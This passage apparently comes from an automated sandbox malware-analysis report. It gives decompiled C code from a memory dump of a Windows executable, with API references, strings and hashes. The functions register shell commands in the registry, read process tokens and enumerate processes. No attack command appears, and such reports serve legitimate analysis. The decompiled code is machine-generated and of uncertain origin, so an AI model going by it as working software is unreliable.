                                                                                                                                                                                                                          				return _t51;
                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                          0x00407c9c
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407cb3
                                                                                                                                                                                                                          0x00407cb4
                                                                                                                                                                                                                          0x00407cbd
                                                                                                                                                                                                                          0x00407cc4
                                                                                                                                                                                                                          0x00407cc5
                                                                                                                                                                                                                          0x00407cd0
                                                                                                                                                                                                                          0x00407cd5
                                                                                                                                                                                                                          0x00407cd6
                                                                                                                                                                                                                          0x00407cdb
                                                                                                                                                                                                                          0x00407ceb
                                                                                                                                                                                                                          0x00407cf0
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407cfc
                                                                                                                                                                                                                          0x00407d00

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                          • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				short _v32;
                                                                                                                                                                                                                          				void _v2078;
                                                                                                                                                                                                                          				signed int _v2080;
                                                                                                                                                                                                                          				void _v4126;
                                                                                                                                                                                                                          				char _v4128;
                                                                                                                                                                                                                          				void _v6174;
                                                                                                                                                                                                                          				char _v6176;
                                                                                                                                                                                                                          				void _v8222;
                                                                                                                                                                                                                          				char _v8224;
                                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                                          				short _t55;
                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t76 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x201c, __ecx);
                                                                                                                                                                                                                          				_t73 = 0;
                                                                                                                                                                                                                          				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                          					return _t73;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v6176 = 0;
                                                                                                                                                                                                                          				memset( &_v6174, 0, 0x7fe);
                                                                                                                                                                                                                          				_t78 = _a4;
                                                                                                                                                                                                                          				_push(_t78 + 0x20a);
                                                                                                                                                                                                                          				_push(_t78);
                                                                                                                                                                                                                          				_push(L"%s\\shell\\%s\\command");
                                                                                                                                                                                                                          				_push(0x3ff);
                                                                                                                                                                                                                          				_push( &_v6176);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                                                                                                                          					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                                                                                                                          					asm("sbb ebx, ebx");
                                                                                                                                                                                                                          					_t73 =  ~_t49 + 1;
                                                                                                                                                                                                                          					RegCloseKey(_v12);
                                                                                                                                                                                                                          					_v2080 = _v2080 & 0x00000000;
                                                                                                                                                                                                                          					memset( &_v2078, 0, 0x7fe);
                                                                                                                                                                                                                          					E00404AD9( &_v2080);
                                                                                                                                                                                                                          					if(_v2078 == 0x3a) {
                                                                                                                                                                                                                          						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                                                                                                                          						_v32 = _t55;
                                                                                                                                                                                                                          						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                                                                                                                          						_v28 = _t56;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						_v32 = _v2080;
                                                                                                                                                                                                                          						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                                                                                                                          							_v4128 = 0;
                                                                                                                                                                                                                          							memset( &_v4126, 0, 0x7fe);
                                                                                                                                                                                                                          							_v8224 = 0;
                                                                                                                                                                                                                          							memset( &_v8222, 0, 0x7fe);
                                                                                                                                                                                                                          							_push(_a4 + 0x20a);
                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                          							_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          							_push(0x3ff);
                                                                                                                                                                                                                          							_push( &_v8224);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_push( &_v2080);
                                                                                                                                                                                                                          							_push(L"\"%s\",0");
                                                                                                                                                                                                                          							_push(0x3ff);
                                                                                                                                                                                                                          							_push( &_v4128);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				RegCloseKey(_v8);
                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404452
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                                                                            • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004044CF
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404539
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040454E
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                                                                            • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                                                                          • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                                                                          • API String ID: 486436031-734527199
                                                                                                                                                                                                                          • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                                                                                                                          				void _v530;
                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                          				void _v1042;
                                                                                                                                                                                                                          				long _v1044;
                                                                                                                                                                                                                          				long _v4116;
                                                                                                                                                                                                                          				char _v5164;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x142c, __ecx);
                                                                                                                                                                                                                          				_v1044 = 0;
                                                                                                                                                                                                                          				memset( &_v1042, 0, 0x1fc);
                                                                                                                                                                                                                          				_v532 = 0;
                                                                                                                                                                                                                          				memset( &_v530, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v532);
                                                                                                                                                                                                                          				_pop(_t44);
                                                                                                                                                                                                                          				E00405AA7( &_v5164);
                                                                                                                                                                                                                          				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                                                                                                                          				_t61 = _t27;
                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v1044,  &_v4116);
                                                                                                                                                                                                                          					_pop(_t44);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscpy(0x40fb90, _a8);
                                                                                                                                                                                                                          				wcscpy(0x40fda0, L"general");
                                                                                                                                                                                                                          				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                                                                                                                          				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                                                                                                                          				wcscpy(0x40fda0, L"strings");
                                                                                                                                                                                                                          				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                                                                                                                          				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                                                                                                                          				return _t38;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          0x0040654e
                                                                                                                                                                                                                          0x00406568
                                                                                                                                                                                                                          0x00406572
                                                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                                                          0x00406582
                                                                                                                                                                                                                          0x0040658a
                                                                                                                                                                                                                          0x00406596

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406484
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004064A0
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                                                                          • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                          • API String ID: 3037099051-2314623505
                                                                                                                                                                                                                          • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                          				void _v315;
                                                                                                                                                                                                                          				char _v316;
                                                                                                                                                                                                                          				void _v826;
                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                          				void _v1338;
                                                                                                                                                                                                                          				char _v1340;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t93;
                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                          				int _t106;
                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v828 = 0;
                                                                                                                                                                                                                          				memset( &_v826, 0, 0x1fe);
                                                                                                                                                                                                                          				_v1340 = 0;
                                                                                                                                                                                                                          				memset( &_v1338, 0, 0x1fe);
                                                                                                                                                                                                                          				_t110 = _t108 + 0x18;
                                                                                                                                                                                                                          				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                                                                                                                          				_t113 = _t61;
                                                                                                                                                                                                                          				_v20 = _t61;
                                                                                                                                                                                                                          				if(_t61 == 0) {
                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                          					if(_v828 == 0) {
                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &_v828);
                                                                                                                                                                                                                          					_push( &_v1340);
                                                                                                                                                                                                                          					_push(L"%s\\%s");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push(_a8);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                          				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                                                                                                                          				_t106 = _v24;
                                                                                                                                                                                                                          				if(_t106 == 0) {
                                                                                                                                                                                                                          					_t32 =  &_v20; // 0x4059ec
                                                                                                                                                                                                                          					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                                                                                                                          					_v316 = 0;
                                                                                                                                                                                                                          					memset( &_v315, 0, 0xfe);
                                                                                                                                                                                                                          					_t110 = _t110 + 0x20;
                                                                                                                                                                                                                          					_v16 = 0xff;
                                                                                                                                                                                                                          					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                          						CloseHandle(_v20);
                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                          							FreeLibrary(_v8);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &_v28);
                                                                                                                                                                                                                          					_push( &_a4);
                                                                                                                                                                                                                          					_push( &_v1340);
                                                                                                                                                                                                                          					_push( &_v12);
                                                                                                                                                                                                                          					_push( &_v828);
                                                                                                                                                                                                                          					_a4 = 0xff;
                                                                                                                                                                                                                          					_push( &_v316);
                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                          					_v12 = 0xff;
                                                                                                                                                                                                                          					E0040906D( &_v8, _t117);
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                          				memset( &_v315, 0, 0xff);
                                                                                                                                                                                                                          				_v12 = _t106;
                                                                                                                                                                                                                          				_t110 = _t110 + 0xc;
                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                          				if(E00408F72( &_v8) == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                                                                                                                          				if(_t93 == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                                                                                                                          				_t117 = _t94;
                                                                                                                                                                                                                          				if(_t94 == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push( &_v28);
                                                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                                                          				_push( &_v1340);
                                                                                                                                                                                                                          				_push( &_v16);
                                                                                                                                                                                                                          				_push( &_v828);
                                                                                                                                                                                                                          				_push(_v316);
                                                                                                                                                                                                                          				_v16 = 0xff;
                                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409BC7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                                                                                                                          • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                                                                                                                          • API String ID: 3504373036-27875219
                                                                                                                                                                                                                          • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409172() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				int _t2;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101bc != 0) {
                                                                                                                                                                                                                          					return _t1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = E00405436(L"psapi.dll");
                                                                                                                                                                                                                          				_t5 = _t2;
                                                                                                                                                                                                                          				if(_t5 == 0) {
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                                                                                                                          					 *0x40f848 = _t2;
                                                                                                                                                                                                                          					if(_t2 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                                                                                                                          						 *0x40f840 = _t2;
                                                                                                                                                                                                                          						if(_t2 != 0) {
                                                                                                                                                                                                                          							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                                                                                                                          							 *0x40f838 = _t2;
                                                                                                                                                                                                                          							if(_t2 != 0) {
                                                                                                                                                                                                                          								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                                                                                                                          								 *0x40fa6c = _t2;
                                                                                                                                                                                                                          								if(_t2 != 0) {
                                                                                                                                                                                                                          									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                                                                                                                          									 *0x40f844 = _t2;
                                                                                                                                                                                                                          									if(_t2 != 0) {
                                                                                                                                                                                                                          										 *0x4101bc = 1;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if( *0x4101bc == 0) {
                                                                                                                                                                                                                          						_t2 = FreeLibrary(_t5);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1182944575-70141382
                                                                                                                                                                                                                          • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004090EE() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t2;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t4;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101b8 != 0) {
                                                                                                                                                                                                                          					return _t1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          				_t4 = _t2;
                                                                                                                                                                                                                          				if(_t4 == 0) {
                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                          					return _t2;
